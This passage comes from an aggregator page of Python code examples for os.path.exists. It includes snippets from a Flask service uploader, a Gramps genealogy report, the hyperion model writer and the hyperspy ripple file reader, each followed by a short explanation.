                    with open(service_path2+"/"+app.config['SERVICE_DICT']['link'], 'w') as f:
                        f.write(link+" "+linkName)
        elif url:
            j_array = []
            if not "." in url or not "git" in url:
                # docker index
                j = 0
                j_array.append(j)
            elif url.rsplit('.', 1)[1] == "git":
                # move to services folder
                i = 0
                # keeps track of the number of the service (if there is more than one)
                j = 0
                try:
                    services = services.replace('&#39;', "'")
                    services = [ item.encode('ascii') for item in literal_eval(services) ]
                except:
                    pass
                service_path = path.join(app.config['UPLOAD_FOLDER'], (url.rsplit('/', 1)[1]).rsplit('.', 1)[0])
                if not services:
                    return render_template("failed.html")
                elif len(services) == 1:
                    while i != -1:
                        try:
                            if i == 0:
                                mv(service_path, app.config['SERVICES_FOLDER'])
                            elif i == 1:
                                mv(service_path, service_path+str(i))
                                mv(service_path+str(i), app.config['SERVICES_FOLDER'])
                            else:
                                mv(service_path+str(i-1), service_path+str(i))
                                mv(service_path+str(i), app.config['SERVICES_FOLDER'])
                            j = i
                            i = -1
                        except:
                            i += 1
                    try:
                        # remove leftover files in tmp
                        rmdir(service_path)
                    except:
                        pass
                else:
                    for service in services:
                        i = 0
                        while i != -1:
                            try:
                                if i == 0:
                                    mv(path.join(service_path, service),
                                       app.config['SERVICES_FOLDER'])
                                elif i == 1:
                                    mv(path.join(service_path, service),
                                       path.join(service_path, service+str(i)))
                                    mv(path.join(service_path, service+str(i)),
                                       app.config['SERVICES_FOLDER'])
                                else:
                                    mv(path.join(service_path, service+str(i-1)),
                                       path.join(service_path, service+str(i)))
                                    mv(path.join(service_path, service+str(i)),
                                       app.config['SERVICES_FOLDER'])
                                j = i
                                i = -1
                            except:
                                i += 1
                        j_array.append(j)
                    try:
                        # remove leftover files in tmp
                        rmtree(service_path)
                    except:
                        pass
                # !! TODO
                # array of services
                # return array of missing files, empty slots for ones that don't need replacing
                # eventually allow this for file upload as well
                # something different is git repo versus docker index
                # can all git repos be handled the same, or are there ones that might be different?
            try:
                services = services.replace('&#39;', "'")
                services = [item.encode('ascii') for item in literal_eval(services)]
            except:
                pass
            if len(services) > 1:
                counter = 0
                for service in services:
                    # update missing_files for array of them,
                    # similarly with description, client, about, body, link, etc.
                    missing_files = request.json['missing_files']
                    if j_array[counter] == 0:
                        j_array[counter] = ""
                    index_service = service.replace("/", "-")
                    meta_path = app.config['SERVICES_FOLDER']+index_service+str(j_array[counter])
                    description_meta(missing_files, counter, url, meta_path)
                    if "client" in missing_files:
                        client = ""
                        clientLanguage = ""
                        clientFilename = "dummy.txt"
                        try:
                            client = request.json['client'+str(counter)]
                            clientLanguage = request.json['clientLanguage'+str(counter)]
                            clientFilename = request.json['clientFilename'+str(counter)]
                        except:
                            pass
                        # if url is docker index
                        if not "." in url or not "git" in url:
                            if not path.exists(meta_path):
                                mkdir(meta_path)
                        if not "." in url or not "git" in url or url.rsplit('.', 1)[1] == "git":
                            if not path.exists(meta_path+"/client"):
                                mkdir(meta_path+"/client")
                            with open(meta_path+"/"+app.config['SERVICE_DICT']['client'], 'w') as f:
                                f.write(clientLanguage+"\n")
                                f.write(clientFilename)
                            with open(meta_path+"/client/"+clientFilename, 'w') as f:
                                f.write(client)
                    if "about" in missing_files:
                        missing_metadata3(counter, j_array, url, index_service, service, "about")
                    if "body" in missing_files:
                        missing_metadata3(counter, j_array, url, index_service, service, "body")
                    if "link" in missing_files:
                        link = "#"
                        linkName = "None"
                        try:
                            link = request.json['link'+str(counter)]
                            linkName = request.json['linkName'+str(counter)]
                        except:
                            pass
                        # if url is docker index
                        if not "." in url or not "git" in url:
                            if not path.exists(meta_path):
                                mkdir(meta_path)
                        if not "." in url or not "git" in url or url.rsplit('.', 1)[1] == "git":
                            if not path.exists(meta_path+"/html"):
                                mkdir(meta_path+"/html")
                            with open(meta_path+"/"+app.config['SERVICE_DICT']['link'], 'w') as f:
                                f.write(link+" "+linkName)
                    counter += 1
            else:
                missing_files = request.json['missing_files']
                if j == 0:
                    j = ""
                index_service = services[0].replace("/", "-")
                meta_path = app.config['SERVICES_FOLDER']+index_service+str(j)
                meta_path2 = app.config['SERVICES_FOLDER']+(url.rsplit('/', 1)[1]).rsplit('.', 1)[0]+str(j)
                description_meta(missing_files, "", url, meta_path)
                if "client" in missing_files:
                    client = ""
                    clientLanguage = ""
                    clientFilename = "dummy.txt"
                    try:
                        client = request.json['client']
                        clientLanguage = request.json['clientLanguage']
                        clientFilename = request.json['clientFilename']
                    except:
                        pass
                    # if url is docker index
                    if not "." in url or not "git" in url:
                        if not path.exists(meta_path):
                            mkdir(meta_path)
                        if not path.exists(meta_path+"/client"):
                            mkdir(meta_path+"/client")
                        with open(meta_path+"/"+app.config['SERVICE_DICT']['client'], 'w') as f:
                            f.write(clientLanguage+"\n")
                            f.write(clientFilename)
                        with open(meta_path+"/client/"+clientFilename, 'w') as f:
                            f.write(client)
                    elif url.rsplit('.', 1)[1] == "git":
                        if not path.exists(meta_path2+"/client"):
                            mkdir(meta_path2+"/client")
                        with open(meta_path2+"/"+app.config['SERVICE_DICT']['client'], 'w') as f:
                            f.write(clientLanguage+"\n")
                            f.write(clientFilename)
                        with open(meta_path2+"/client/"+clientFilename, 'w') as f:
                            f.write(client)
                if "about" in missing_files:
                    missing_metadata2(j, url, index_service, services, 'about')
                if "body" in missing_files:
                    missing_metadata2(j, url, index_service, services, 'body')
                if "link" in missing_files:
                    link = "#"
                    linkName = "None"
                    try:
                        link = request.json['link']
                        linkName = request.json['linkName']
                    except:
                        pass
                    # if url is docker index
                    if not "." in url or not "git" in url:
                        if not path.exists(meta_path):
                            mkdir(meta_path)
                        if not path.exists(meta_path+"/html"):
                            mkdir(meta_path+"/html")
                        with open(meta_path+"/"+app.config['SERVICE_DICT']['link'], 'w') as f:
                            f.write(link+" "+linkName)
                    elif url.rsplit('.', 1)[1] == "git":
                        if not path.exists(meta_path2+"/html"):
                            mkdir(meta_path2+"/html")
                        with open(meta_path2+"/"+app.config['SERVICE_DICT']['link'], 'w') as f:
                            f.write(link+" "+linkName)
    except:
        pass
    return jsonify(url=app.config['DOMAIN'])
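
The Flask handler above leans on path.exists for one recurring idiom: make sure a service's client/ or html/ metadata directory exists before writing files into it. Below is a compact sketch of that ensure-directory helper; the function name and arguments are illustrative, not part of wharf.

from os import mkdir, path


def ensure_subdir(base, name):
    """Create base/name if it is missing and return the full path."""
    target = path.join(base, name)
    if not path.exists(target):
        mkdir(target)  # only create the directory when it is absent, as forms.py does
    return target

On Python 3, os.makedirs(target, exist_ok=True) covers the same case, including missing parent directories, without the explicit exists check.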

Example 128

Project: addons-source
Source File: PersonEverything.py
View license
    def print_object(self, level, o):

        if issubclass(o.__class__, gramps.gen.lib.address.Address):
            # Details of address are printed by the subclass conditions,
            # primarily by LocationBase, because address is a subclass of
            # LocationBase
            pass

        if issubclass(o.__class__, gramps.gen.lib.addressbase.AddressBase):
            for address in o.get_address_list():
                self.print_header(level, _("Address"), ref=address)
                self.print_object(level+1, address)

        if isinstance(o, gramps.gen.lib.Attribute):
            # The unique information about attributes (the type) is printed by
            # AttributeBase
            pass

        if issubclass(o.__class__, gramps.gen.lib.attrbase.AttributeBase):
            for attribute in o.get_attribute_list():
                self.print_header(level, _("Attribute")+". ",
                                  type_desc=str(attribute.get_type()),
                                  obj_type=attribute.get_value(),
                                  privacy=attribute.get_privacy(),
                                  ref=attribute)
                self.print_object(level+1, attribute)

        if isinstance(o, gramps.gen.lib.ChildRef):
            # The unique information about ChildRef (the father relation and
            # mother relation) is printed by the main write_report function
            pass

        if issubclass(o.__class__, gramps.gen.lib.citationbase.CitationBase):
            if self.print_citations:
                self.print_header(level, "CitationBase tbd")

                for citation_handle in o.get_citation_list():
                    citation = self.database.get_citation_from_handle(
                                                            citation_handle)
                    self.print_object(level+1, citation)

        if isinstance(o, gramps.gen.lib.Citation):
            # the unique information about Citation (the page) is printed by the
            # bibliography code. The other unique information, the confidence is
            # printed here
            if o.get_confidence_level() != gramps.gen.lib.Citation.CONF_NORMAL:
                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                self.doc.start_bold()
                self.doc.write_text(_("Confidence") + " : ")
                self.doc.end_bold()
                self.doc.write_text(conf_strings.get(o.get_confidence_level(),
                                                     _('Unknown')))
                self.doc.end_paragraph()

            if self.print_citations:
                source_handle = o.get_reference_handle()
                source = self.database.get_source_from_handle(source_handle)
                self.print_object(level+1, source)

        if issubclass(o.__class__, gramps.gen.lib.datebase.DateBase):
            if o.get_date_object() and not o.get_date_object().is_empty():
                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                self.doc.start_bold()
                self.doc.write_text(_("Date") + " : ")
                self.doc.end_bold()
                self.doc.write_text(displayer.display(o.get_date_object()))
                self.doc.end_paragraph()

        if isinstance(o, gramps.gen.lib.Event):
            # The event type is printed by the main write_report function
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Description") + " : ")
            self.doc.end_bold()
            self.doc.write_text(str(o.get_description()))
            self.doc.end_paragraph()

        if issubclass(o.__class__, gramps.gen.lib.eventref.EventRef):
            # The unique information about EventRef (the EventRoleType) is
            # printed by the main write_report function
            event = self.database.get_event_from_handle(o.get_reference_handle())
            self.print_header(level, _("Event"), event.get_gramps_id(),
                              _("Event type"), str(event.get_type()),
                              event.get_privacy(),
                              ref=event)
            self.print_object(level+1, event)

        if isinstance(o, gramps.gen.lib.Family):
            # The unique information about Family (father, mother and children,
            # FamilyRelType and event references) are printed by the main
            # write_report function
            pass

        if isinstance(o, gramps.gen.lib.LdsOrd):
            # The Ordinance type is printed by LdsOrdBase
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Temple and status") + " : ")
            self.doc.end_bold()
            self.doc.write_text(", ".join((TEMPLES.name(o.get_temple()),
                                           o.status2str()
                                   )))
            self.doc.end_paragraph()

            f_h = o.get_family_handle()
            if f_h:
                family = self.database.get_family_from_handle(f_h)
                self.print_family_summary(level+1, family,
                                          _("LDS Ordinance family"))

        if issubclass(o.__class__, gramps.gen.lib.ldsordbase.LdsOrdBase):
            for ldsord in o.get_lds_ord_list():
                self.print_header(level, _("LDS "),
                                  type_desc=_("Ordinance"),
                                  obj_type=ldsord.type2str(),
                                  privacy=ldsord.get_privacy(),
                                  ref=ldsord)
                self.print_object(level+1, ldsord)

        if isinstance(o, gramps.gen.lib.Location):
            # The unique information about location (Parish) is printed by
            # Place. Location otherwise serves as a pointer to a LocationBase
            # object
            pass

        if issubclass(o.__class__, gramps.gen.lib.locationbase.LocationBase):
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Street, City, County, State, Postal Code, "
                                  "Country, Phone number") + " : ")
            self.doc.end_bold()
            self.doc.write_text(", ".join((o.get_street(),
                                            o.get_city(),
                                            o.get_county(),
                                            o.get_state(),
                                            o.get_postal_code(),
                                            o.get_country(),
                                            o.get_phone())))
            self.doc.end_paragraph()

        if issubclass(o.__class__, gramps.gen.lib.mediabase.MediaBase):
            for mediaref in o.get_media_list():
                self.print_header(level, _("Media Reference"), ref=mediaref)
                self.print_object(level+1, mediaref)

        if isinstance(o, gramps.gen.lib.Media):
            # thumb is not printed. The mime type is printed by MediaRef
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Description and Path") + " : ")
            self.doc.end_bold()
            self.doc.write_text(o.get_description() + ", ")
            path = o.get_path()
            if path:
                mark = IndexMark("file://:" +
                                 media_path_full(self.database, path),
                                 LOCAL_HYPERLINK)
                self.doc.write_text(path, mark=mark)
            self.doc.end_paragraph()

            mime_type = o.get_mime_type()
            if mime_type and mime_type.startswith("image"):
                filename = media_path_full(self.database, o.get_path())
                if os.path.exists(filename):
                    self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                    self.doc.add_media(filename, "single", 4.0, 4.0)
                    self.doc.end_paragraph()
                else:
                    self._user.warn(_("Could not add photo to page"),
                          "%s: %s" % (filename, _('File does not exist')))

        if isinstance(o, gramps.gen.lib.MediaRef):
            media_handle = o.get_reference_handle()
            media = self.database.get_media_from_handle(media_handle)

            if o.get_rectangle():
                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                self.doc.start_bold()
                self.doc.write_text(_("Referenced Region") + " : ")
                self.doc.end_bold()
                self.doc.write_text(", ".join((("%d" % i) for i in o.get_rectangle())))
                self.doc.end_paragraph()

                mime_type = media.get_mime_type()
                if mime_type and mime_type.startswith("image"):
                    filename = media_path_full(self.database,
                                               media.get_path())
                    if os.path.exists(filename):
                        self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                        self.doc.add_media(filename, "single", 4.0, 4.0,
                                                  crop=o.get_rectangle()
                                                  )
                        self.doc.end_paragraph()

            desc = get_description(media.get_mime_type())
            if not desc:
                desc = _("unknown")
            self.print_header(level, _("Media Object"),
                              media.get_gramps_id(),
                              _("Mime type"),
                              desc,
                              media.get_privacy(),
                              ref=media)
            self.print_object(level+1, media)

        if isinstance(o, gramps.gen.lib.Name):
            # group_as, sort_as and display_as are not printed. NameType is
            # printed by the main write_report function
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Given name(s): Title, Given, Suffix, "
                                  "Call Name, Nick Name, Family Nick Name") +
                                  " : ")
            self.doc.end_bold()
            self.doc.write_text(", ".join((o.get_title(),
                                           o.get_first_name(),
                                           o.get_suffix(),
                                           o.get_call_name(),
                                           o.get_nick_name(),
                                           o.get_family_nick_name())))
            self.doc.end_paragraph()

        if isinstance(o, gramps.gen.lib.Note):
            # The NoteType is printed by NoteBase. Whether the note is flowed or
            # not is not printed, but affects the way the note appears
            self.doc.write_styled_note(o.get_styledtext(),
                                       o.get_format(),
                                       "PE-Level%d" % min(level, 32),
                                       contains_html = o.get_type()
                                        == gramps.gen.lib.notetype.NoteType.HTML_CODE
                                      )

        if issubclass(o.__class__, gramps.gen.lib.notebase.NoteBase):
            for n_h in o.get_note_list():
                note = self.database.get_note_from_handle(n_h)
                self.print_header(level, _("Note"), note.get_gramps_id(),
                                  _("Note type"), str(note.get_type()),
                                  note.get_privacy())
                self.print_object(level+1, note)

        if issubclass(o.__class__, gramps.gen.lib.Person):
            # This is printed by the main write-report function
            pass

        if isinstance(o, gramps.gen.lib.Place):
            # The title, name, type, code and lat/long are printed by PlaceBase
            for placeref in o.get_placeref_list():
                self.print_header(level, _("Parent Place"))
                self.print_object(level+1, placeref)

#            location = o.get_main_location()
#            if location.get_parish():
#                self.print_header(level, _("Main Location"),
#                                  type_desc=_("Parish"),
#                                  obj_type=location.get_parish())
#            else:
#                self.print_header(level, _("Main Location"))
#
#            self.print_object(level+1, location)
#
            for location in o.get_alternate_locations():
                if location.get_parish():
                    self.print_header(level, _("Alternate Location"),
                                      type_desc=_("Parish"),
                                      obj_type=location.get_parish())
                else:
                    self.print_header(level, _("Alternate Location"))
                self.print_object(level+1, location)

        if issubclass(o.__class__, gramps.gen.lib.placebase.PlaceBase) or \
            issubclass(o.__class__, gramps.gen.lib.placeref.PlaceRef):
            if issubclass(o.__class__, gramps.gen.lib.placebase.PlaceBase):
                place_handle = o.get_place_handle()
            else:
                place_handle = o.get_reference_handle()
            if place_handle:
                place = self.database.get_place_from_handle(place_handle)
                if place:
                    place_title = place_displayer.display(self.database, place)
                    self.print_header(level, _("Place"), place.get_gramps_id(),
                                      _("Place Title"), place_title,
                                      privacy=place.get_privacy(),
                                      ref=place)
                    self.doc.start_paragraph("PE-Level%d" % min(level+1, 32))
                    self.doc.start_bold()
                    self.doc.write_text(_("Name") + " : ")
                    self.doc.end_bold()
                    self.doc.write_text(place.get_name().value)
                    self.doc.start_bold()
                    self.doc.write_text(" " + _("Type") + " : ")
                    self.doc.end_bold()
                    self.doc.write_text(str(place.get_type()))
                    self.doc.start_bold()
                    self.doc.write_text(" " + _("Code") + " : ")
                    self.doc.end_bold()
                    self.doc.write_text(place.get_code())
                    self.doc.end_paragraph()

                    for name in place.get_alternative_names():
                        self.doc.start_paragraph("PE-Level%d" % min(level+1, 32))
                        self.doc.start_bold()
                        self.doc.write_text(_("Alternative Name") + " : ")
                        self.doc.end_bold()
                        self.doc.write_text(name)
                        self.doc.end_paragraph()

                    if place.get_longitude() or place.get_latitude():
                        self.doc.start_paragraph("PE-Level%d" % min(level+1, 32))
                        self.doc.start_bold()
                        self.doc.write_text(_("Latitude, Longitude") + " : ")
                        self.doc.end_bold()
                        self.doc.write_text(", ".join((place.get_longitude(),
                                                       place.get_latitude())))
                        self.doc.end_paragraph()

                    self.print_object(level+1, place)

        if issubclass(o.__class__, gramps.gen.lib.primaryobj.BasicPrimaryObject):
            # The Gramps ID is printed by the enclosing object
            pass


        if issubclass(o.__class__, gramps.gen.lib.privacybase.PrivacyBase):
            # The privacy is printed by the enclosing object
            pass

        if isinstance(o, gramps.gen.lib.RepoRef):
            # The media type is printed by source
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Call number") + " : ")
            self.doc.end_bold()
            self.doc.write_text(o.get_call_number())
            self.doc.end_paragraph()

            repository_handle = o.get_reference_handle()
            repository = self.database.get_repository_from_handle(repository_handle)
            self.print_header(level, _("Repository"), repository.get_gramps_id(),
                              _("Repository type"), str(repository.get_type()),
                              privacy=repository.get_privacy())
            self.print_object(level+1, repository)

        if isinstance(o, gramps.gen.lib.Repository):
            # the repository type is printed by RepoRef
            pass

        if isinstance(o, gramps.gen.lib.Source):
            # The title, author, abbreviation and publication information are
            # printed by the bibliography code
#            data_map = o.get_data_map()
#            for key in data_map.keys():
#                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
#                self.doc.start_bold()
#                self.doc.write_text(_("Data") + ". " + key + " : ")
#                self.doc.end_bold()
#                self.doc.write_text(data_map[key])
#                self.doc.end_paragraph()

            reporef_list = o.get_reporef_list()
            for reporef in reporef_list:
                self.print_header(level, _("Repository reference"),
                                  type_desc=_("Media type"),
                                  obj_type=str(reporef.get_media_type()),
                                  privacy=reporef.get_privacy())
                self.print_object(level+1, reporef)

        if isinstance(o, gramps.gen.lib.Surname):
            if o.get_origintype():
                self.print_header(level, _("Surname"),
                                  type_desc=_("Origin type"),
                                  obj_type=str(o.get_origintype()))
            else:
                self.print_header(level, _("Surname"),
                                  privacy=o.get_privacy())
            self.doc.start_paragraph("PE-Level%d" % min(level+1, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Prefix, surname, connector") + " : ")
            self.doc.end_bold()
            self.doc.write_text(", ".join((o.get_prefix(), o.get_surname(),
                                           o.get_connector())))
            if o.get_primary():
                self.doc.write_text(" " + _("{This is the primary surname}"))
            self.doc.end_paragraph()

        if isinstance(o, gramps.gen.lib.surnamebase.SurnameBase):
            surname_list = o.get_surname_list()
            for surname in surname_list:
                self.print_object(level, surname)

        if issubclass(o.__class__, gramps.gen.lib.tagbase.TagBase):
            for tag_handle in o.get_tag_list():
                tag = self.database.get_tag_from_handle(tag_handle)
                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                self.doc.start_bold()
                self.doc.write_text(_("Tag name") + " : ")
                self.doc.end_bold()
                self.doc.write_text(tag.get_name())
                self.doc.end_paragraph()
                self.print_object(level+1, tag)

        if issubclass(o.__class__, gramps.gen.lib.Tag):
            # The tag name is printed by TagBase
            if o.get_color() != "#000000000000" or o.get_priority() != 0:
                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                self.doc.start_bold()
                self.doc.write_text(_("Tag colour and priority") + " : ")
                self.doc.end_bold()
                self.doc.write_text(o.get_color() + ", " +
                                    "%d" % o.get_priority())
                self.doc.end_paragraph()

        if issubclass(o.__class__, gramps.gen.lib.urlbase.UrlBase):
            for url in o.get_url_list():
                self.print_header(level, _("URL"),
                                  type_desc=_("Type"),
                                  obj_type=str(url.get_type()),
                                  privacy=url.get_privacy())
                self.print_object(level+1, url)

        if isinstance(o, gramps.gen.lib.Url):
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Description and Path") + " : ")
            self.doc.end_bold()
            self.doc.write_text(o.get_description() + ", ")
            path = o.get_path()
            if path:
                mark = IndexMark(path, LOCAL_HYPERLINK)
                self.doc.write_text(path, mark=mark)
            self.doc.end_paragraph()

        return o
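
In the Media branch above, os.path.exists guards the call that embeds an image, so a missing file produces a warning instead of a failure. Here is a minimal sketch of that guard, assuming a doc object with an add_media method and a warn callback (both hypothetical stand-ins for the report classes used in the example):

import os

def add_image_if_present(doc, filename, warn):
    # Embed the image only when the file is actually on disk;
    # otherwise report a warning, as the report code above does.
    if os.path.exists(filename):
        doc.add_media(filename, "single", 4.0, 4.0)
    else:
        warn("Could not add photo to page",
             "%s: File does not exist" % filename)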

Example 129

Project: hyperion
Source File: model.py
View license
    def write(self, filename=None, compression=True, copy=True,
              absolute_paths=False, wall_dtype=float,
              physics_dtype=float, overwrite=True):
        '''
        Write the model input parameters to an HDF5 file

        Parameters
        ----------
        filename : str
            The name of the input file to write. If no name is specified, the
            filename is constructed from the model name.
        compression : bool
            Whether to compress the datasets inside the HDF5 file.
        copy : bool
            Whether to copy all external content into the input file, or
            whether to just link to external content.
        absolute_paths : bool
            If copy=False, then if absolute_paths is True, absolute filenames
            are used in the link, otherwise the path relative to the input
            file is used.
        wall_dtype : type
            Numerical type to use for wall positions.
        physics_dtype : type
            Numerical type to use for physical grids.
        overwrite : bool
            Whether to overwrite any pre-existing file
        '''

        # If no filename has been specified, use the model name to construct
        # one. If neither have been specified, raise an exception.
        if filename is None:
            if self.name is not None:
                filename = self.name + '.rtin'
            else:
                raise ValueError("filename= has not been specified and model "
                                 "has no name")

        # Remove previous file if it exists
        if overwrite and os.path.exists(filename):
            os.remove(filename)

        # Check that grid has been set up
        if self.grid is None:
            raise Exception("No coordinate grid has been set up")

        # Check that containing directory exists to give a more understandable
        # message than 'File does not exist', since this might confuse users
        # (it is the output directory that does not exist)
        if not os.path.dirname(filename) == "":
            if not os.path.exists(os.path.dirname(filename)):
                raise IOError("Directory %s does not exist" %
                              os.path.dirname(filename))

        # Create output file
        delete_file(filename)
        root = h5py.File(filename, 'w')

        # Add Python version
        root.attrs['python_version'] = np.string_(__version__.encode('utf-8'))

        # Create all the necessary groups and sub-groups
        g_sources = root.create_group('Sources')
        g_output = root.create_group('Output')
        g_peeled = g_output.create_group('Peeled')
        g_binned = g_output.create_group('Binned')

        # Output sources
        for i, source in enumerate(self.sources):
            if isinstance(source, MapSource):
                source.write(g_sources, 'source_%05i' % (i + 1), self.grid,
                             compression=compression, map_dtype=physics_dtype)
            else:
                source.write(g_sources, 'source_%05i' % (i + 1))

        # Output configuration for peeled images/SEDs
        for i, peel in enumerate(self.peeled_output):
            if not self._frequencies is None:
                if not peel._monochromatic:
                    raise Exception("Peeled images need to be set to monochromatic mode")
            peel.write(g_peeled.create_group('group_%05i' % (i + 1)))

        # Output configuration for binned images/SEDs
        if self.binned_output is not None:
            if self.forced_first_interaction:
                raise Exception("can't use binned images with forced first interaction - use set_forced_first_interaction(False) to disable")
            self.binned_output.write(g_binned.create_group('group_00001'))

        # Write monochromatic configuration
        self._write_monochromatic(root, compression=compression)

        # Write run-time and output configuration
        self.write_run_conf(root)
        self.conf.output.write(g_output)

        if isinstance(self.grid, GridOnDisk):

            g_grid = link_or_copy(root, 'Grid', self.grid.link, copy=copy, absolute_paths=absolute_paths)

        else:

            # Create group
            g_grid = root.create_group('Grid')

            # Check self-consistency of grid
            self.grid._check_array_dimensions()

            # Write the geometry and physical quantity arrays to the input file
            self.grid.write(g_grid, copy=copy, absolute_paths=absolute_paths, compression=compression, physics_dtype=physics_dtype)

        if 'density' in self.grid:

            # Check if dust types are specified for each
            if self.dust is None:
                raise Exception("No dust properties specified")

            if isinstance(self.dust, h5py.ExternalLink):

                link_or_copy(root, 'Dust', self.dust, copy, absolute_paths=absolute_paths)

            elif isinstance(self.dust, h5py.Group):

                root.copy(self.dust, 'Dust')

            elif type(self.dust) == list:

                g_dust = root.create_group('Dust')

                if self.grid['density'].n_dust != len(self.dust):
                    raise Exception("Number of density grids should match number of dust types")

                # Output dust file, avoiding writing the same dust file multiple times
                present = {}
                for i, dust in enumerate(self.dust):

                    short_name = 'dust_%03i' % (i + 1)

                    if copy:

                        if isinstance(dust, six.string_types):
                            dust = SphericalDust(dust)

                        if dust.hash() in present:
                            g_dust[short_name] = h5py.SoftLink(present[dust.hash()])
                        else:
                            dust.write(g_dust.create_group(short_name))
                            present[dust.hash()] = short_name

                    else:

                        if type(dust) != str:
                            if dust._file is None:
                                raise ValueError("Dust properties are not located in a file, so cannot link. Use copy=True or write the dust properties to a file first")
                            else:
                                # Check that hash still matches file
                                if dust.hash() != dust._file[1]:
                                    raise ValueError("Dust properties have been modified since "
                                                     "being read in, so cannot link to dust file "
                                                     "on disk. You can solve this by writing out "
                                                     "the dust properties to a new file, or by "
                                                     "using copy=True.")
                                dust = dust._file[0]

                        if absolute_paths:
                            path = os.path.abspath(dust)
                        else:
                            # Relative path should be relative to input file, not current directory.
                            path = os.path.relpath(dust, os.path.dirname(filename))

                        g_dust[short_name] = h5py.ExternalLink(path, '/')

            else:
                raise ValueError("Unknown type for dust attribute: %s" % type(self.dust))

            _n_dust = len(root['Dust'])

            # Write minimum specific energy
            if self._minimum_temperature is not None:

                if np.isscalar(self._minimum_temperature):
                    _minimum_temperature = [self._minimum_temperature for i in range(_n_dust)]
                elif len(self._minimum_temperature) != _n_dust:
                    raise Exception("Number of minimum_temperature values should match number of dust types")
                else:
                    _minimum_temperature = self._minimum_temperature

                _minimum_specific_energy = []
                for i, dust in enumerate(root['Dust']):
                    d = SphericalDust(root['Dust'][dust])
                    _minimum_specific_energy.append(d.temperature2specific_energy(_minimum_temperature[i]))

            elif self._minimum_specific_energy is not None:

                if np.isscalar(self._minimum_specific_energy):
                    _minimum_specific_energy = [self._minimum_specific_energy for i in range(_n_dust)]
                elif len(self._minimum_specific_energy) != _n_dust:
                    raise Exception("Number of minimum_specific_energy values should match number of dust types")
                else:
                    _minimum_specific_energy = self._minimum_specific_energy

            else:

                _minimum_specific_energy = None

            if isinstance(self.grid, GridOnDisk):
                if _minimum_specific_energy is not None:
                    raise ValueError("Cannot set minimum specific energy or temperature when using grid from disk")
            elif _minimum_specific_energy is not None:
                g_grid['Quantities'].attrs["minimum_specific_energy"] = [float(x) for x in _minimum_specific_energy]

        else:

            root.create_group('Dust')

        # Check that there are no NaN values in the file - if there are, a
        # warning is emitted.
        check_for_nans(root)

        root.close()

        self.filename = filename
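
write() uses os.path.exists twice: once to remove a pre-existing output file when overwrite=True, and once to check that the containing directory exists so the user gets a clearer error than "File does not exist". A minimal sketch of those two checks, with a hypothetical helper name:

import os

def prepare_output_path(filename, overwrite=True):
    # Remove a previous file if overwriting is allowed.
    if overwrite and os.path.exists(filename):
        os.remove(filename)
    # Fail early with an explicit message if the output directory is missing.
    parent = os.path.dirname(filename)
    if parent and not os.path.exists(parent):
        raise IOError("Directory %s does not exist" % parent)

In new code one could instead create the directory with os.makedirs(parent, exist_ok=True); the example prefers to raise so that a mistyped output path is noticed.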

Example 130

Project: hyperspy
Source File: ripple.py
View license
def file_reader(filename, rpl_info=None, encoding="latin-1",
                mmap_mode='c', *args, **kwds):
    """Parses a Lispix (http://www.nist.gov/lispix/) ripple (.rpl) file
    and reads the data from the corresponding raw (.raw) file;
    or, read a raw file if the dictionary rpl_info is provided.

    This format is often used in EDS/EDX experiments.

    Images and spectral images or data cubes that are written in the
    (Lispix) raw file format are just a continuous string of numbers.

    Data cubes can be stored image by image, or spectrum by spectrum.
    Single images are stored row by row, vector cubes are stored row by row
    (each row spectrum by spectrum), image cubes are stored image by image.

    All of the numbers are in the same format, such as 16 bit signed integer,
    IEEE 8-byte real, 8-bit unsigned byte, etc.

    The "raw" file should be accompanied by text file with the same name and
    ".rpl" extension. This file lists the characteristics of the raw file so
    that it can be loaded without human intervention.

    Alternatively, dictionary 'rpl_info' containing the information can
    be given.

    Some keys are specific to HyperSpy and will be ignored by other software.

    RPL stands for "Raw Parameter List", an ASCII text, tab delimited file in
    which HyperSpy reads the image parameters for a raw file.

                    TABLE OF RPL PARAMETERS
        key             type     description
      ----------   ------------ --------------------
      # Mandatory      keys:
      width            int      # pixels per row
      height           int      # number of rows
      depth            int      # number of images or spectral pts
      offset           int      # bytes to skip
      data-type        str      # 'signed', 'unsigned', or 'float'
      data-length      str      # bytes per pixel  '1', '2', '4', or '8'
      byte-order       str      # 'big-endian', 'little-endian', or 'dont-care'
      record-by        str      # 'image', 'vector', or 'dont-care'
      # X-ray keys:
      ev-per-chan      int      # optional, eV per channel
      detector-peak-width-ev  int   # optional, FWHM for the Mn K-alpha line
      # HyperSpy-specific keys
      depth-origin    int      # energy offset in pixels
      depth-scale     float    # energy scaling (units per pixel)
      depth-units     str      # energy units, usually eV
      depth-name      str      # Name of the magnitude stored as depth
      width-origin         int      # column offset in pixels
      width-scale          float    # column scaling (units per pixel)
      width-units          str      # column units, usually nm
      width-name      str           # Name of the magnitude stored as width
      height-origin         int      # row offset in pixels
      height-scale          float    # row scaling (units per pixel)
      height-units          str      # row units, usually nm
      height-name      str           # Name of the magnitude stored as height
      signal            str        # Name of the signal stored, e.g. HAADF
      convergence-angle float   # TEM convergence angle in mrad
      collection-angle  float   # EELS spectrometer collection semi-angle in mrad
      beam-energy       float   # TEM beam energy in keV
      elevation-angle   float   # Elevation angle of the EDS detector
      azimuth-angle     float   # Azimuth angle of the EDS detector
      live-time         float   # Live time per spectrum
      energy-resolution float   # Resolution of the EDS (FHWM of MnKa)
      tilt-stage        float   # The tilt of the stage
      date              str     # date in ISO 8601
